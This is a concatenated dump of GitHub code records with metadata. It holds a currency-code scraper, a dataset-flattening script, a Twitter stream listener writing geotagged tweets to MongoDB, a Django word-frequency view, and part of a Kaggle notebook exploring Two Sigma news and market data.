requests\nfrom bs4 import BeautifulSoup\n\nURL = requests.get(\"https://www.iban.com/currency-codes\")\nsoup = BeautifulSoup(URL.text, \"html.parser\")\n\npages = soup.find(\"table\",{\"class\":\"table\"})\npage = pages.find_all(\"tbody\")\n\ntemporarily = {}\nnumber_country = {}\n\ncountries_lists = []\nfor country in page:\n\n a = country.find_all(\"td\")\n a = list(a)\n\n country_list = 0\n code_list = 2\n\n while code_list >= 0:\n b = a[country_list].text\n c = a[code_list].text \n temporarily[f\"{b}\"] = f\"{c}\"\n country_list +=4\n code_list +=4\n if code_list >= len(a):\n break\n results = {key: value for key, value in temporarily.items() if len(value) != 0}\n\ncountries_lists.append(list(results))\ncountries_lists = countries_lists[0]\ncountries_list = [i.strip() for i in countries_lists]\n\n\ndef start():\n country = results.keys() \n max_numb = len(results.keys()) \n number = 0\n print(\"hello, my friend! Please choose select a country by number:\")\n for i in country: \n print(f\" # {number} {i}\")\n number += 1\n if number >= max_numb:\n break\n while[1]:\n try:\n select = int(input(\" # : \")) \n if countries_list[select] in countries_list:\n print(F\" You choose {countries_list[select]} \\n The currency code is {results[countries_list[select]]}\")\n break\n elif type(select) == int:\n print(\" please, enter a number from the list.\")\n else:\n print(\" That's wasn't a number.\") \n except: \n print(\" That's wasn't a number.\")\n\nstart()", "repo_name": "WinterWhiteSnow/github", "sub_path": "~08.01까지/nadocoding/6.18.py", "file_name": "6.18.py", "file_ext": "py", "file_size_in_byte": 1715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "40399551079", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom multiprocessing import Pool, cpu_count\n\nfrom ncc_dataset.codexglue.code_to_text import (\n LANGUAGES, RAW_DIR, ATTRIBUTES_DIR,\n)\nfrom ncc import LOGGER\nfrom ncc.utils.file_ops import (\n file_io,\n json_io,\n)\nfrom ncc.utils.path_manager import PathManager\n\n\ndef flatten_attrs(raw_file, flatten_dir, lang, attrs):\n def _get_file_info(filename):\n \"\"\"get mode and file index from file name\"\"\"\n filename = os.path.split(filename)[-1]\n mode = filename[:str.rfind(filename, '.jsonl')]\n return mode\n\n mode = _get_file_info(raw_file)\n attr_writers = {}\n for attr in attrs:\n attr_file = os.path.join(flatten_dir, lang, f'{mode}.{attr}')\n PathManager.mkdir(os.path.dirname(attr_file))\n attr_writers[attr] = file_io.open(attr_file, 'w')\n print('raw_file: ', raw_file)\n with file_io.open(raw_file, 'r') as reader:\n for line in reader:\n code_snippet = json_io.json_loads(line)\n for attr, info in code_snippet.items():\n if attr in attr_writers:\n print(json_io.json_dumps(info), file=attr_writers[attr])\n\n\ndef flatten(raw_dir, lang, flatten_dir, attrs, num_cores):\n \"\"\"flatten attributes of raw data\"\"\"\n LOGGER.info('Flatten the attributes({}) of {} raw dataset'.format(attrs, lang))\n\n with Pool(num_cores) as mpool:\n result = [\n mpool.apply_async(\n flatten_attrs,\n (raw_file, flatten_dir, lang, set(attrs))\n )\n for raw_file in PathManager.ls(os.path.join(raw_dir, lang, '*.jsonl'))\n ]\n result = [res.get() for res in result]\n\n\nif __name__ == '__main__':\n \"\"\"\n This script is to flatten attributes of code_search_net dataset\n Examples: 'code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name', 'original_string', 'index',\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Download CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--languages\", \"-l\", default=LANGUAGES, type=str, nargs='+', help=\"languages constain [{}]\".format(LANGUAGES),\n )\n parser.add_argument(\n \"--raw_dataset_dir\", \"-r\", default=RAW_DIR, type=str, help=\"raw dataset download directory\",\n )\n parser.add_argument(\n \"--attributes_dir\", \"-d\", default=ATTRIBUTES_DIR, type=str, help=\"data directory of flatten attribute\",\n )\n parser.add_argument(\n \"--attrs\", \"-a\",\n default=['code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name'],\n type=str, nargs='+',\n help=\"attrs: code, code_tokens, docstring\",\n )\n parser.add_argument(\n \"--cores\", \"-c\", default=cpu_count(), type=int, help=\"cpu cores for flatten raw data attributes\",\n )\n args = parser.parse_args()\n # print(args)\n\n for lang in args.languages:\n flatten(raw_dir=args.raw_dataset_dir, lang=lang, flatten_dir=args.attributes_dir, attrs=args.attrs,\n num_cores=args.cores)\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc_dataset/codexglue/code_to_text/attributes_cast.py", "file_name": "attributes_cast.py", "file_ext": "py", "file_size_in_byte": 3056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.utils.path_manager.PathManager.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 30, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 30, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 32, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 32, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_loads", "line_number": 34, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 34, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 37, "usage_type": "name"}, {"api_name": "ncc.LOGGER.info", "line_number": 42, "usage_type": "call"}, {"api_name": "ncc.LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 44, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager.ls", "line_number": 50, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "ncc_dataset.codexglue.code_to_text.LANGUAGES", "line_number": 62, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.RAW_DIR", "line_number": 65, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.ATTRIBUTES_DIR", "line_number": 68, "usage_type": "name"}, {"api_name": "multiprocessing.cpu_count", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "12934990057", "text": "from __future__ import absolute_import, print_function\n\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport tweepy\nimport json\nfrom pymongo import MongoClient\nimport datetime\n\n# Your credentials go here\n\n\nclass AvengersListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n else:\n print('ERROR:' + repr(status_code))\n return True\n\n def on_data(self, raw_data):\n status = json.loads(raw_data)\n try:\n if 'delete' not in status: # Tweepy también detecta cuando se ha eliminado un tweet\n if status['geo']:\n created_at = status['created_at']\n created_at = datetime.datetime.strptime(created_at, '%a %b %d %H:%M:%S +0000 %Y')\n user_name = status['user']['screen_name']\n text = status['text']\n lat = str(status['coordinates']['coordinates'][1])\n lon = str(status['coordinates']['coordinates'][0])\n rts = status['retweet_count']\n favs = status['favorite_count']\n lang = status['user']['lang']\n print(status['text'])\n client = MongoClient('localhost', 27017)\n db = client['Tweets']\n collection = db['avengers']\n tweet = {'date': created_at, 'user': user_name, 'tweet': text,\n 'latitude': lat, 'longitude': lon, 'language': lang, 'retweets':rts, 'favourites':favs}\n collection.insert_one(tweet)\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n\n\nif __name__ == '__main__':\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n print(api.me().name)\n #\n # places = api.geo_search(query=\"USA\", granularity=\"country\")\n # place_id = places[0].id\n # tweets = api.search(q=\"place:%s\" % place_id)\n\n av_stream = Stream(auth, AvengersListener())\n av_stream.filter(track=['#avengersendgame','#endgame'])\n", "repo_name": "russomaa/Data-Science-Master", "sub_path": "BD_map_tweets/avengerslistener.py", "file_name": "avengerslistener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.streaming.StreamListener", "line_number": 14, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "71961221927", "text": "from collections import OrderedDict\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom .forms import GraphifyForm\nimport json\nimport string\n\ndef error_404(request):\n return render(request, \"404.html\", {})\n\n\ndef error_500(request):\n return render(request, \"500.html\", {})\n\n# Create your views here.\nclass HomeView(View):\n\tform_class = GraphifyForm\n\ttemplate_name = \"home.html\"\n\n\tdef get(self, request, *args, **kwargs):\n\t\tform = self.form_class(None)\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'labels': None,\n\t\t\t'data': None\n\t\t}\n\t\treturn render(request, self.template_name, context)\n\n\tdef post(self, request):\n\t\tform = self.form_class(request.POST, request.FILES or None)\n\t\terror = None\n\n\t\tif form.is_valid():\n\t\t\ttext_file = form.cleaned_data['file_input']\n\t\t\tdisplay_num = int(form.cleaned_data['display_num'])\n\t\t\tword_count = {}\n\n\t\t\tif not text_file:\n\t\t\t\tcontext ={\n\t\t\t\t\t'form':form,\n\t\t\t\t\t'labels': None,\n\t\t\t\t\t'data': None\n\t\t\t\t}\n\t\t\t\treturn render(request, self.template_name, context)\n\n\t\t\t# chck if this file is a text file\n\t\t\tif '.txt' in str(text_file)[-4:]:\n\t\t\t\ttry:\n\t\t\t\t\ttext_file_data = form.cleaned_data['file_input'].read().decode('utf-8')\n\t\t\t\t\ttranslator = text_file_data.maketrans('', '', string.punctuation)\n\t\t\t\t\ttext_file_data = text_file_data.translate(translator).lower()\n\n\t\t\t\t\tfor word in text_file_data.split():\n\t\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\t\tword_count[word] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tword_count[word] = 1\n\n\t\t\t\texcept UnicodeDecodeError as u:\n\t\t\t\t\terror = 'The file you tried to parse has encountered \\\n\t\t\t\t\ta unicode decoding error. Please fix the file and \\\n\t\t\t\t\tresubmit.'\n\t\t\t\texcept:\n\t\t\t\t\terror = 'An unknown error occured.'\n\n\t\t\telse:\n\t\t\t\terror = 'Please enter a text file please'\n\n\t\t\t# make sure the size of the list matches the\n\t\t\t# total number of bar you want to return\n\t\t\t# also put data in the right order\n\t\t\tlabels = []\n\t\t\tdata = []\n\t\t\tcount = len(word_count)\n\t\t\tword_count = OrderedDict(sorted(word_count.items(), key=lambda t: t[1]))\n\t\t\tword_count = list(word_count.items())\n\t\t\tword_count.reverse()\n\n\t\t\tif display_num > count:\n\t\t\t\tdisplay_num = count\n\n\t\t\tfor i in word_count[:display_num]:\n\t\t\t data.append(str(i[0]))\n\t\t\t labels.append(str(i[1]))\n\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'error': error,\n\t\t\t'labels': json.dumps(labels),\n\t\t\t'data': json.dumps(data)\n\t\t}\n\t\treturn render(request, self.template_name, context)\n", "repo_name": "devmasternathan/graphify", "sub_path": "graphify/graph/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 19, "usage_type": "name"}, {"api_name": "forms.GraphifyForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "10146213215", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Complete EDA + features engineering + voting LightGBM\n# Nguyen Dang Minh, PhD\n# \n# * [Loading the data](#load_data)\n# * [Exploring news data](#explore_news)\n# * [Exploring market data](#explore_market)\n# * [Preprocessing](#preprocessing)\n# * [Features engineering](#feature_engineering)\n# * [Building model](#building_model)\n# * [Making submission](#making_submission)\n\n# In this notebook, I will present my statistical analysis on both the news and market data of the Kaggle problem: [Using News to Predict Stock Movements](http://https://www.kaggle.com/c/two-sigma-financial-news)\n\n# In[ ]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport re\nfrom scipy import stats\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\nimport random\nrandom.seed(1)\nimport time\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import get_scorer\nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import VotingClassifier\nimport lightgbm as lgb\nfrom sklearn.externals.joblib import Parallel, delayed\nfrom sklearn.base import clone\n\nimport pickle\n\n# In[ ]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# In[ ]:\n\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\n# In[ ]:\n\n\nfrom kaggle.competitions import twosigmanews\n# You can only call make_env() once, so don't lose it!\nenv = twosigmanews.make_env()\nprint('Done!')\n\n# \n# \n# ## Load the data\n\n# In[ ]:\n\n\n(market_train_orig, news_train_orig) = env.get_training_data()\n\n# In[ ]:\n\n\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\nprint('Market train shape: ',market_train_df.shape)\nprint('News train shape: ', news_train_df.shape)\n\n# In[ ]:\n\n\nmarket_train_df.describe()\n\n# In[ ]:\n\n\nnews_train_df.describe()\n\n# \n# \n# ## Explore news data\n\n# ### Evolutions over time\n\n# In[ ]:\n\n\n# Sort values by time then extract date\nnews_train_df = news_train_df.sort_values(by='time')\nnews_train_df['date'] = news_train_df['time'].dt.date\n\n# In[ ]:\n\n\n# Function to plot time series data\ndef plot_vs_time(data_frame, column, calculation='mean', span=10):\n if calculation == 'mean':\n group_temp = data_frame.groupby('date')[column].mean().reset_index()\n if calculation == 'count':\n group_temp = data_frame.groupby('date')[column].count().reset_index()\n if calculation == 'nunique':\n group_temp = data_frame.groupby('date')[column].nunique().reset_index()\n group_temp = group_temp.ewm(span=span).mean()\n fig = plt.figure(figsize=(10,3))\n plt.plot(group_temp['date'], group_temp[column])\n plt.xlabel('Time')\n plt.ylabel(column)\n plt.title('%s versus time' %column)\n\n# In[ ]:\n\n\nplot_vs_time(news_train_df, 'sourceId', calculation='count', span=10)\nplt.title('News count vs time')\nplt.ylabel('Count')\n\n# There is a maximum peak every quarter (time for quaterly financial report) and a minimum peak at the end of the year (time for Christmast holliday.)\n\n# In[ ]:\n\n\n# Plot time evolution of several parameters\n\ncolumns = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H', 'volumeCounts24H']\n\nfor column in columns:\n plot_vs_time(news_train_df, column)\n\n# ### Time delay\n\n# In[ ]:\n\n\ntime_delay = (pd.to_datetime(news_train_df['time']) - pd.to_datetime(news_train_df['firstCreated']))\ntime_delay_log10 = np.log10(time_delay.dt.total_seconds()/60+1)\n\n# In[ ]:\n\n\nplt.hist(time_delay_log10, bins=np.arange(0,2.5,0.25), rwidth=0.7)\nplt.xlabel('$Log_{10}$(Time delay in minutes +1)')\nplt.ylabel('Counts')\nplt.title('Delay time distribution')\n\n# In[ ]:\n\n\ntime_delay_min = time_delay.dt.total_seconds()/60\ntime_delay_df = time_delay_min.to_frame().join(news_train_df['date'].to_frame())\ntime_delay_df.columns = ['delay','date']\nplot_vs_time(time_delay_df, 'delay')\nplt.ylabel('Delay (minutes)')\n\n# ### Urgency\n\n# In[ ]:\n\n\nurgency_count = news_train_df.groupby('urgency')['sourceId'].count()\nurgency_count = urgency_count/urgency_count.sum()\nprint('Urgency ratio')\nurgency_count.sort_values(ascending=True)\ndel urgency_count\n\n# ### Take sequence\n\n# In[ ]:\n\n\ntake_sequence = news_train_df.groupby('takeSequence')['sourceId'].count()\n\n# In[ ]:\n\n\ntake_sequence = take_sequence.sort_values(ascending= False)\ntake_sequence[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Take sequence')\nplt.title('Top 10 take sequence')\nplt.gca().invert_yaxis()\ndel take_sequence\n\n# ### Providers\n\n# In[ ]:\n\n\nprovider_count = news_train_df.groupby('provider')['sourceId'].count()\n\n# In[ ]:\n\n\nprovider_sort = provider_count.sort_values(ascending= False)\nprovider_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Provider')\nplt.title('Top 10 news provider')\nplt.gca().invert_yaxis()\ndel provider_count\n\n# ### Subjects\n\n# In[ ]:\n\n\n# Extract data from a single cell\ndef contents_to_list(contents):\n text = contents[1:-1]\n text = re.sub(r\",\",' ',text)\n text = re.sub(r\"'\",\"\", text)\n text_list = text.split(' ')\n return text_list\n\n# Put data from columns into dict\ndef get_content_dict(content_column):\n content_dict = {}\n for i in range(len(content_column)):\n this_cell = content_column[i]\n content_list = contents_to_list(this_cell) \n for content in content_list:\n if content in content_dict.keys():\n content_dict[content] += 1\n else:\n content_dict[content] = 1\n return content_dict\n\n\n# In[ ]:\n\n\nsubjects = news_train_df.sample(n=10000, random_state=1)['subjects']\nsubjects_dict = get_content_dict(subjects)\n\n# In[ ]:\n\n\nsubjects_df = pd.Series(subjects_dict).sort_values(ascending=False)\nsubjects_df[:15].plot.barh()\nplt.ylabel('Subjects')\nplt.xlabel('Counts')\nplt.title('Top subjects for 10k data')\nplt.gca().invert_yaxis()\ndel subjects_df\n\n# ### Audiences\n\n# In[ ]:\n\n\naudiences = news_train_df.sample(n=10000, random_state=1)['audiences']\naudiences_dict = get_content_dict(audiences)\n\n# In[ ]:\n\n\naudiences_df = pd.Series(audiences_dict).sort_values(ascending=False)\naudiences_df[:15].plot.barh()\nplt.ylabel('Audiences')\nplt.xlabel('Counts')\nplt.title('Top audiences for 10k data')\nplt.gca().invert_yaxis()\n\n# ### Company Count\n\n# In[ ]:\n\n\nnews_train_df['companyCount'].hist(bins=np.arange(0,30,1))\nplt.xlabel('Company count')\nplt.title('Company count distribution')\n\n# ### Head line tag\n\n# In[ ]:\n\n\nhead_line = news_train_df.groupby('headlineTag')['sourceId'].count()\n\n# In[ ]:\n\n\nhead_line_sort = head_line.sort_values(ascending= False)\nhead_line_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Head line')\nplt.title('Top 10 head lines')\nplt.gca().invert_yaxis()\ndel head_line\n\n# Most headlines are blank. This properties may not be important.\n\n# ### First sentence - Urgency - relevance - sentiment Word Count\n\n# **First sentence and urgency**\n\n# In[ ]:\n\n\nnews_train_df['firstMentionSentence'].hist(bins=np.arange(0,20,1))\nplt.xlabel('First mention sentence')\nplt.ylabel('Count')\nplt.title('First mention sentence distribution')\n\n# In[ ]:\n\n\nsentence_urgency = news_train_df.groupby('firstMentionSentence')['urgency'].mean()\nsentence_urgency.head(5)\ndel sentence_urgency\n\n# **First sentence and relevance**\n\n# In[ ]:\n\n\nnews_train_df['relevance'].hist(bins=np.arange(0,1.01,0.05))\nplt.xlabel('Relevance')\nplt.ylabel('Count')\nplt.title('Relevance distribution')\n\n# In[ ]:\n\n\nsentence_relevance = news_train_df.groupby('firstMentionSentence')['relevance'].mean()\nsentence_relevance[:15].plot.barh()\nplt.xlabel('Relevance')\nplt.title('Relevance by sentence')\nplt.gca().invert_yaxis()\ndel sentence_relevance\n\n# **Sentiment word count and relevance**\n\n# In[ ]:\n\n\nsentimentWordCount = news_train_df.groupby('sentimentWordCount')['sourceId'].count().reset_index()\nplt.plot(sentimentWordCount['sentimentWordCount'], sentimentWordCount['sourceId'])\nplt.xlim(0,300)\nplt.xlabel('Sentiment words count')\nplt.ylabel('Count')\nplt.title('Sentiment words count distribution')\ndel sentimentWordCount\n\n# In[ ]:\n\n\nsentimentWordRatio = news_train_df.groupby('sentimentWordCount')['relevance'].mean()\nplt.plot(sentimentWordRatio)\nplt.xlim(0,2000)\nplt.ylabel('Relevance')\nplt.xlabel('Sentiment word count')\nplt.title('Sentiment word count and relevance')\ndel sentimentWordRatio\n\n# **Sentiment ratio**\n\n# In[ ]:\n\n\nnews_train_df['sentimentRatio'] = news_train_df['sentimentWordCount']/news_train_df['wordCount']\nnews_train_df['sentimentRatio'].hist(bins=np.linspace(0,1.001,40))\nplt.xlabel('Sentiment ratio')\nplt.ylabel('Count')\nplt.title('Sentiment ratio distribution')\n\n# In[ ]:\n\n\nnews_train_df.sample(n=10000, random_state=1).plot.scatter('sentimentRatio', 'relevance')\nplt.title('Relevance vs sentiment ratio of 10k samples')\n\n# ### Asset name\n\n# In[ ]:\n\n\nasset_name = news_train_df.groupby('assetName')['sourceId'].count()\nprint('Total number of assets: ',news_train_df['assetName'].nunique())\n\n# In[ ]:\n\n\nasset_name = asset_name.sort_values(ascending=False)\nasset_name[:10].plot.barh()\nplt.gca().invert_yaxis()\nplt.xlabel('Count')\nplt.title('Top 10 assets news')\n\n# In[ ]:\n\n\nfor i, j in zip([-1, 0, 1], ['negative', 'neutral', 'positive']):\n df_sentiment = news_train_df.loc[news_train_df['sentimentClass'] == i, 'assetName']\n print(f'Top mentioned companies for {j} sentiment are:')\n print(df_sentiment.value_counts().head(5))\n print('')\n\n# ### Remove outliers and plot correlation\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n temp_frame = data_frame\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n temp_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return temp_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nnews_rmv_outlier = remove_outliers(news_train_df, columns_outlier)\n\n# In[ ]:\n\n\n# Plot correlation\ncolumns_corr = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H',\\\n 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D','volumeCounts24H','volumeCounts3D','volumeCounts5D','volumeCounts7D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(news_rmv_outlier[columns_corr].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# \n# \n# ## Explore market data\n\n# In[ ]:\n\n\nprint('Check null data:')\nmarket_train_df.isna().sum()\n\n# **Some preprocessing:**\n# * Sort data in chronological order\n# * All NAN data comes from the market adjusted column. We fill them up with the raw value data\n\n# In[ ]:\n\n\n# Sort data\nmarket_train_df = market_train_df.sort_values('time')\nmarket_train_df['date'] = market_train_df['time'].dt.date\n\n# Fill nan\nmarket_train_fill = market_train_df\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_fill[column_market[i]] = market_train_fill[column_market[i]].fillna(market_train_fill[column_raw[i]])\n\n# ### Plot data versus time\n\n# In[ ]:\n\n\nplot_vs_time(market_train_fill, 'assetCode', 'count')\nplt.title('Number of asset codes versus time')\n\n# In[ ]:\n\n\n# Inspired by https://www.kaggle.com/artgor/eda-feature-engineering-and-everything\nfor i in [0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95]:\n price_df = market_train_fill.groupby('date')['close'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['close'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Price')\nplt.title('Market close price by quantile')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsClosePrevRaw1'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsClosePrevRaw1'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsClosePrevRaw1 by quantile')\n\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevRaw10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevRaw10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevRaw10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenNextMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenNextMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenNextMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['volume'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['volume'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Volumes')\nplt.title('Market trade volumes by quantile')\n\n# ### Difference between raw values and market adjusted values\n# \n# Let see if there's any difference between raw return and market adjusted return\n\n# In[ ]:\n\n\ncolumn_mkt_raw_diff = []\nfor i in range(len(column_market)):\n this_raw = column_raw[i]\n this_market = column_market[i]\n new_column_name = 'mkt_raw_diff'+this_raw.replace('returns','').replace('Raw','')\n column_mkt_raw_diff.append(new_column_name)\n market_train_fill[new_column_name] = market_train_fill[this_market] - market_train_fill[this_raw]\n\n# In[ ]:\n\n\nmarket_train_fill[column_mkt_raw_diff].describe()\n\n# The difference between raw return and market adjusted returns are negligible, but there are some extreme values. Those values are noise and needs to be taken care of\n\n# ### Asset codes\n\n# In[ ]:\n\n\nassetCode_df = market_train_df.groupby('assetCode')['volume'].sum().sort_values(ascending=False)\nprint('There are %i unique asset code' %len(assetCode_df))\n\n# In[ ]:\n\n\nunknown_name = market_train_fill[market_train_fill['assetName']=='Unknown']\nunknown_count = unknown_name['assetCode'].value_counts().sort_values(ascending=False)\n\n# In[ ]:\n\n\nprint('There are %i unique asset code with unknown asset name' %len(unknown_count))\n\n# In[ ]:\n\n\nunknown_count[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Counts')\nplt.title('Top 15 asset code with Unknown asset name')\nplt.gca().invert_yaxis()\n\n# In[ ]:\n\n\nassetCode_df[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset code by 